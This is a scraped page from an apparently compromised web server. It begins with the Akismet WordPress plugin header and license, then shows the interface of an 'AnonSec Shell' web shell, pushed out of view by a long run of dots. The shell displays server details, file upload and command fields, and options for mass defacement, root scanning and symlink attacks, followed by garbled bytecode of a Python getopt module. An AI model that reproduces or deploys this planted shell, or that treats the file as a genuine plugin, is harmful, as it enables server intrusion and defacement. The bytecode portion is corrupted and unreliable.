#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib64/python2.7/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib64/python2.7/getopt.pyc
�
ٜSec@s�dZddddgZddlZdefd��YZeZgd�Zgd	�Zd
�Zd�Z	d�Z
d
�Zedkr�ddl
Z
ee
jddddg�GHndS(s�Parser for command line options.

This module helps scripts to parse the command line arguments in
sys.argv.  It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--').  Long options similar to those supported by GNU software
may be used as well via an optional third argument.  This module
provides two functions and an exception:

getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
tGetoptErrorterrortgetoptt
gnu_getopti����NcBs)eZdZdZdd�Zd�ZRS(tcCs)||_||_tj|||�dS(N(tmsgtoptt	Exceptiont__init__(tselfRR((s/usr/lib64/python2.7/getopt.pyR)s		cCs|jS(N(R(R	((s/usr/lib64/python2.7/getopt.pyt__str__.s(t__name__t
__module__RRRR
(((s/usr/lib64/python2.7/getopt.pyR&scCs�g}t|�td�kr*|g}nt|�}x�|r�|djd�r�|ddkr�|ddkr�|d}Pn|djd�r�t||dd||d�\}}q9t||dd||d�\}}q9W||fS(s@getopt(args, options[, long_options]) -> opts, args

    Parses command line options and parameter list.  args is the
    argument list to be parsed, without the leading reference to the
    running program.  Typically, this means "sys.argv[1:]".  shortopts
    is the string of option letters that the script wants to
    recognize, with options that require an argument followed by a
    colon (i.e., the same format that Unix getopt() uses).  If
    specified, longopts is a list of strings with the names of the
    long options which should be supported.  The leading '--'
    characters should not be included in the option name.  Options
    which require an argument should be followed by an equal sign
    ('=').

    The return value consists of two elements: the first is a list of
    (option, value) pairs; the second is the list of program arguments
    left after the option list was stripped (this is a trailing slice
    of the first argument).  Each option-and-value pair returned has
    the option as its first element, prefixed with a hyphen (e.g.,
    '-x'), and the option argument as its second element, or an empty
    string if the option has no argument.  The options occur in the
    list in the same order in which they were found, thus allowing
    multiple occurrences.  Long and short options may be mixed.

    Rit-s--ii(ttypetlistt
startswithtdo_longst	do_shorts(targst	shortoptstlongoptstopts((s/usr/lib64/python2.7/getopt.pyR3s,
*+cCsjg}g}t|t�r'|g}nt|�}|jd�rU|d}t}n!tjjd�rpt}nt}x�|r_|ddkr�||d7}Pn|dd dkr�t	||dd||d�\}}qy|dd dkr-|ddkr-t
||dd||d�\}}qy|rA||7}Pqy|j|d�|d}qyW||fS(sgetopt(args, options[, long_options]) -> opts, args

    This function works like getopt(), except that GNU style scanning
    mode is used by default. This means that option and non-option
    arguments may be intermixed. The getopt() function stops
    processing options as soon as a non-option argument is
    encountered.

    If the first character of the option string is `+', or if the
    environment variable POSIXLY_CORRECT is set, then option
    processing stops as soon as a non-option argument is encountered.

    t+itPOSIXLY_CORRECTis--iR
(t
isinstancetstrRRtTruetostenvirontgettFalseRRtappend(RRRRt	prog_argstall_options_first((s/usr/lib64/python2.7/getopt.pyR^s2
			*$*
cCs�y|jd�}Wntk
r,d}nX|| ||d}}t||�\}}|r�|dkr�|s�td||��n|d|d}}q�n"|dk	r�td||��n|jd||p�df�||fS(Nt=isoption --%s requires argumentis%option --%s must not have an arguments--R(tindext
ValueErrortNonet
long_has_argsRR (RRRRtitoptargthas_arg((s/usr/lib64/python2.7/getopt.pyR�s

cCs�g|D]}|j|�r|^q}|sDtd||��n||krZt|fS|d|krtt|fSt|�dkr�td||��nt|�dks�t�|d}|jd�}|r�|d }n||fS(Nsoption --%s not recognizedR#isoption --%s not a unique prefixii����(RRRRtlentAssertionErrortendswith(RRtot
possibilitiestunique_matchR*((s/usr/lib64/python2.7/getopt.pyR'�s(



cCs�x�|dkr�|d|d}}t||�r�|dkrs|s[td||��n|d|d}}n|d}}nd}|jd||f�qW||fS(NRiisoption -%s requires argumentR
(t
short_has_argRR (Rt	optstringRRRR)((s/usr/lib64/python2.7/getopt.pyR�s
cCshxNtt|��D]:}|||ko4dknr|jd|d�SqWtd||��dS(Nt:isoption -%s not recognized(trangeR+RR(RRR(((s/usr/lib64/python2.7/getopt.pyR1�s t__main__isa:bsalpha=tbeta(t__doc__t__all__RRRRRRRR'RR1Rtsystargv(((s/usr/lib64/python2.7/getopt.pyt<module>s+2				

Anon7 - 2022
AnonSec Team